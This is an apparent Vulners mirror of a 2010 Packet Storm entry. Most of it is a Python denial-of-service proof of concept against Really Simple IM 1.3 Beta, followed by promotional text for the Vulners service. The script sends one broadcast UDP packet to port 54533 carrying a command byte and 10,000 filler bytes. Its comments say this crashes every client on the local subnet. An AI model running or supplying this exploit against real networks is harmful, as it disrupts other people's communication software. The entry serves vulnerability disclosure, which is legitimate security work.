Lucene search
K

Really Simple IM 1.3 Beta Denial Of Service

🗓️ 20 Jul 2010 00:00:00Reported by loneferretType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Really Simple IM 1.3 Beta Denial Of Service bug proof of concept in Python

Code
`#!/usr/bin/python  
  
import socket  
import sys  
  
# Bug found: 18th July 2010  
# DoS proof of concept  
# Found by: loneferret  
# Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3  
  
# Really Simple IM verion 1.3 beta  
# Software: http://code.google.com/p/reallysimpleim/  
# Nods to exploit-db  
# I don't want this on injector <- notice the no leet talk.  
  
# This little application uses UDP to & send receive messages.  
# It broadcasts everything, and picks up everything  
# on port 54533.  
# The funny thing with this PoC, it will crash all clients  
# in the same subnet. Yup it's that funny. That's the only thing it does too...  
# No EIP, no SEH but the buffer is still in memory at the  
# moment of the crash. Figured I'd share anyway.  
  
  
#Commands  
# 'p' Connect and adds users to list  
# 'a' Disconnect message  
# 'b' Send message  
# 't' Direct message  
  
host = '192.168.xxx.255' #Adjust broadcast address to your network  
port = 54533  
  
buffer  
  
  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
s.bind((host,0))  
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)  
except:  
print "socket() failed"  
sys.exit(1)  
  
da = "p"  
da += "W00T" + ("\x41" * 10000)  
s.sendto(da, (host, port))  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
20